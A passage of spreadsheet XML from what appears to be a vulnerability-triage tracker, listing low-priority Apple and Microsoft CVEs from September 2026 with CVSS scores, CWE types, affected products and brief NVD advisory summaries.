        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65401</t>
        </is>
      </c>
      <c r="D1077" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1077" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1077" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1077" s="5" t="inlineStr"/>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1077" s="5" t="inlineStr"/>
      <c r="M1077" s="5" t="inlineStr"/>
      <c r="N1077" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1077" s="5" t="inlineStr"/>
      <c r="Q1077" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1077" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved state handling. This issue is fixed in macOS Golden Gate 27, macOS Tahoe 26.7. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65401</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65402</t>
        </is>
      </c>
      <c r="D1078" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1078" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1078" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1078" s="5" t="inlineStr"/>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1078" s="5" t="inlineStr"/>
      <c r="M1078" s="5" t="inlineStr"/>
      <c r="N1078" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1078" s="5" t="inlineStr"/>
      <c r="Q1078" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1078" s="5" t="inlineStr">
        <is>
          <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65402</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65404</t>
        </is>
      </c>
      <c r="D1079" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1079" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1079" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1079" s="5" t="inlineStr"/>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos</t>
        </is>
      </c>
      <c r="L1079" s="5" t="inlineStr"/>
      <c r="M1079" s="5" t="inlineStr"/>
      <c r="N1079" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1079" s="5" t="inlineStr"/>
      <c r="Q1079" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1079" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 18.7.10 and iPadOS 18.7.10, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.7.8, macOS Sonoma 14.8.8. A malicious application may be able to bypass Privacy preferences.</t>
        </is>
      </c>
      <c r="S1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65404</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65405</t>
        </is>
      </c>
      <c r="D1080" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1080" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1080" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1080" s="5" t="inlineStr"/>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1080" s="5" t="inlineStr"/>
      <c r="M1080" s="5" t="inlineStr"/>
      <c r="N1080" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1080" s="5" t="inlineStr"/>
      <c r="Q1080" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="R1080" s="5" t="inlineStr">
        <is>
          <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to determine kernel memory layout.</t>
        </is>
      </c>
      <c r="S1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65405</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65406</t>
        </is>
      </c>
      <c r="D1081" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1081" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1081" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1081" s="5" t="inlineStr"/>
      <c r="H1081" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1081" s="5" t="inlineStr"/>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos</t>
        </is>
      </c>
      <c r="L1081" s="5" t="inlineStr"/>
      <c r="M1081" s="5" t="inlineStr"/>
      <c r="N1081" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1081" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1081" s="5" t="inlineStr"/>
      <c r="Q1081" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R1081" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65406</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65407</t>
        </is>
      </c>
      <c r="D1082" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1082" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1082" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1082" s="5" t="inlineStr"/>
      <c r="H1082" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1082" s="5" t="inlineStr"/>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1082" s="5" t="inlineStr"/>
      <c r="M1082" s="5" t="inlineStr"/>
      <c r="N1082" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1082" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1082" s="5" t="inlineStr"/>
      <c r="Q1082" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1082" s="5" t="inlineStr">
        <is>
          <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 26.6 and iPadOS 26.6, iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.6, macOS Tahoe 26.7, tvOS 26.6, tvOS 27, visionOS 26.6, visionOS 27, watchOS 26.6, watchOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65407</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65409</t>
        </is>
      </c>
      <c r="D1083" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1083" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1083" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1083" s="5" t="inlineStr"/>
      <c r="H1083" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1083" s="5" t="inlineStr"/>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1083" s="5" t="inlineStr"/>
      <c r="M1083" s="5" t="inlineStr"/>
      <c r="N1083" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1083" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1083" s="5" t="inlineStr"/>
      <c r="Q1083" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1083" s="5" t="inlineStr">
        <is>
          <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause a denial of service.</t>
        </is>
      </c>
      <c r="S1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65409</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65411</t>
        </is>
      </c>
      <c r="D1084" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1084" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1084" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1084" s="5" t="inlineStr"/>
      <c r="H1084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1084" s="5" t="inlineStr"/>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:visionos</t>
        </is>
      </c>
      <c r="L1084" s="5" t="inlineStr"/>
      <c r="M1084" s="5" t="inlineStr"/>
      <c r="N1084" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1084" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1084" s="5" t="inlineStr"/>
      <c r="Q1084" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1084" s="5" t="inlineStr">
        <is>
          <t>A path handling issue was addressed with improved validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, visionOS 27. An app may be able to modify protected parts of the file system.</t>
        </is>
      </c>
      <c r="S1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65411</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65413</t>
        </is>
      </c>
      <c r="D1085" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1085" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1085" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1085" s="5" t="inlineStr"/>
      <c r="H1085" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1085" s="5" t="inlineStr"/>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1085" s="5" t="inlineStr"/>
      <c r="M1085" s="5" t="inlineStr"/>
      <c r="N1085" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1085" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1085" s="5" t="inlineStr"/>
      <c r="Q1085" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1085" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to cause a denial of service.</t>
        </is>
      </c>
      <c r="S1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65413</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68830</t>
        </is>
      </c>
      <c r="D1086" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1086" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1086" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1086" s="5" t="inlineStr"/>
      <c r="H1086" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1086" s="5" t="inlineStr"/>
      <c r="J1086" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1086"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086" s="5" t="inlineStr"/>
      <c r="M1086" s="5" t="inlineStr"/>
      <c r="N1086" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1086" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1086" s="5" t="inlineStr"/>
      <c r="Q1086" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="R1086" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68831</t>
        </is>
      </c>
      <c r="D1087" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1087" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1087" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1087" s="5" t="inlineStr"/>
      <c r="H1087" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1087" s="5" t="inlineStr"/>
      <c r="J1087" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1087"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087" s="5" t="inlineStr"/>
      <c r="M1087" s="5" t="inlineStr"/>
      <c r="N1087" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1087" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1087" s="5" t="inlineStr"/>
      <c r="Q1087" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R1087" s="5" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68842</t>
        </is>
      </c>
      <c r="D1088" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1088" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1088" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1088" s="5" t="inlineStr"/>
      <c r="H1088" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1088" s="5" t="inlineStr"/>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L1088" s="5" t="inlineStr"/>
      <c r="M1088" s="5" t="inlineStr"/>
      <c r="N1088" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1088" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1088" s="5" t="inlineStr"/>
      <c r="Q1088" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R1088" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69286</t>
        </is>
      </c>
      <c r="D1089" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1089" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1089" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1089" s="5" t="inlineStr"/>
      <c r="H1089" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1089" s="5" t="inlineStr"/>
      <c r="J1089" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1089"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089" s="5" t="inlineStr"/>
      <c r="M1089" s="5" t="inlineStr"/>
      <c r="N1089" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1089" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1089" s="5" t="inlineStr"/>
      <c r="Q1089" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R1089" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69343</t>
        </is>
      </c>
      <c r="D1090" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1090" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1090" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1090" s="5" t="inlineStr"/>
      <c r="H1090" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1090" s="5" t="inlineStr"/>
      <c r="J1090" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1090"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090" s="5" t="inlineStr"/>
      <c r="M1090" s="5" t="inlineStr"/>
      <c r="N1090" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1090" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1090" s="5" t="inlineStr"/>
      <c r="Q1090" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1090" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69457</t>
        </is>
      </c>
      <c r="D1091" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1091" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1091" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1091" s="5" t="inlineStr"/>
      <c r="H1091" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1091" s="5" t="inlineStr"/>
      <c r="J1091" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1091"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091" s="5" t="inlineStr"/>
      <c r="M1091" s="5" t="inlineStr"/>
      <c r="N1091" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1091" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1091" s="5" t="inlineStr"/>
      <c r="Q1091" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1091" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69527</t>
        </is>
      </c>
      <c r="D1092" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1092" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1092" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1092" s="5" t="inlineStr"/>
      <c r="H1092" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1092" s="5" t="inlineStr"/>
      <c r="J1092" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1092"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092" s="5" t="inlineStr"/>
      <c r="M1092" s="5" t="inlineStr"/>
      <c r="N1092" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1092" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1092" s="5" t="inlineStr"/>
      <c r="Q1092" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1092" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69808</t>
        </is>
      </c>
      <c r="D1093" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1093" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1093" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1093" s="5" t="inlineStr"/>
      <c r="H1093" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1093" s="5" t="inlineStr"/>
